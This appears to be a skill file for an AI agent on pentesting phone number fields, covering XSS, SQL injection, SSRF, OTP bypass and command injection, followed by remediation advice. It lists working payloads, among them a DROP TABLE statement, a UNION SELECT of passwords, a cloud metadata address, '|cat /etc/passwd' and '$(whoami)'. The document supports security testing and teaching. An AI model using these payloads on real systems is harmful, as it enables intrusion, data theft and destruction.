OpenSkillIndex← back to search

Hacktricks-skills phone-number-injection-testing

Test phone number input fields for injection vulnerabilities including XSS, SQLi, SSRF, and OTP bypass attacks. Use this skill whenever you need to assess web application security, test form inputs, audit phone number fields, or investigate potential injection points in user-submitted data. Don't skip this when reviewing any form that accepts phone numbers - these fields are commonly overlooked attack vectors.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/phone-number-injections/SKILL.MD
source content

Phone Number Injection Testing

Phone number input fields are frequently overlooked attack vectors. This skill guides you through testing for injection vulnerabilities that occur when applications don't properly sanitize phone number inputs.

What This Skill Covers

  • XSS via phone numbers: Injecting JavaScript through phone number fields
  • SQLi via phone numbers: SQL injection through phone number parameters
  • SSRF via phone numbers: Server-side request forgery through phone number fields
  • OTP bypass: Exploiting phone number fields to bypass or brute-force OTP systems
  • Format manipulation: Adding strings after phone numbers to exploit backend processing

When to Use This Skill

Use this skill when:

  • You're auditing a web application with phone number input fields
  • You're testing registration, login, or contact forms
  • You're investigating potential injection vulnerabilities
  • You're performing security assessments on user input handling
  • You need to document phone number field security issues

Testing Methodology

1. Identify Phone Number Fields

Locate all phone number input fields in the application:

  • Registration forms
  • Login/verification forms
  • Contact forms
  • Profile settings
  • Checkout/payment forms
  • API endpoints accepting phone numbers

2. Test for XSS

Phone number fields often lack proper sanitization. Test with:

+1234567890"><script>alert(1)</script>
+1234567890"><img src=x onerror=alert(1)>
+1234567890"><svg onload=alert(1)>

What to look for:

  • Script execution in the browser
  • Reflected XSS in error messages
  • Stored XSS if the number is saved and displayed later

3. Test for SQL Injection

Phone numbers are often used in database queries. Test with:

+1234567890' OR '1'='1
+1234567890" OR "1"="1
+1234567890'; DROP TABLE users--
+1234567890' UNION SELECT username,password FROM users--

What to look for:

  • SQL error messages
  • Different behavior (login success, different results)
  • Time-based delays (for blind SQLi)

4. Test for SSRF

If phone numbers trigger backend processing (SMS, validation), test with:

+1234567890@127.0.0.1
+1234567890@localhost
+1234567890@169.254.169.254 (AWS metadata)

What to look for:

  • Internal network access
  • Metadata endpoint access
  • Different error messages indicating backend processing

5. Test for OTP Bypass

Phone number fields used for OTP delivery can be exploited:

+1234567890,+19999999999 (multiple numbers)
+1234567890&+19999999999 (concatenation)
+1234567890;+19999999999 (semicolon)
+1234567890|+19999999999 (pipe)

What to look for:

  • Multiple OTPs sent
  • OTP sent to attacker-controlled number
  • OTP bypass (no OTP required)

6. Test Format Manipulation

Add strings after phone numbers to exploit backend processing:

+1234567890;ls
+1234567890|cat /etc/passwd
+1234567890`whoami`
+1234567890$(whoami)

What to look for:

  • Command execution
  • File access
  • Information disclosure

Common Vulnerabilities

1. Lack of Input Validation

Applications often fail to validate phone number formats, allowing injection payloads to pass through.

2. Improper Sanitization

Even when validation exists, sanitization may be incomplete, leaving injection vectors open.

3. Backend Processing

Phone numbers may be processed by backend systems (SMS gateways, validation services) that don't expect malicious input.

4. Database Queries

Phone numbers are often used in database queries without proper parameterization.

Reporting Findings

When documenting phone number injection vulnerabilities:

  1. Describe the vulnerability: What type of injection was found
  2. Provide proof of concept: Show the payload and its effect
  3. Explain the impact: What an attacker could do
  4. Recommend remediation: How to fix the issue

Remediation Recommendations

1. Input Validation

  • Validate phone number format using regex
  • Allow only digits, +, -, (, ), and spaces
  • Reject any other characters

2. Parameterized Queries

  • Use parameterized queries for all database operations
  • Never concatenate user input into SQL queries

3. Output Encoding

  • Encode all output to prevent XSS
  • Use context-aware encoding (HTML, JavaScript, URL, etc.)

4. Backend Sanitization

  • Sanitize phone numbers before passing to backend systems
  • Validate format at every layer

5. Rate Limiting

  • Implement rate limiting for OTP requests
  • Monitor for abuse patterns

Tools and Resources

  • Burp Suite: For intercepting and modifying requests
  • OWASP ZAP: For automated scanning
  • SQLMap: For SQL injection testing
  • XSStrike: For XSS testing

References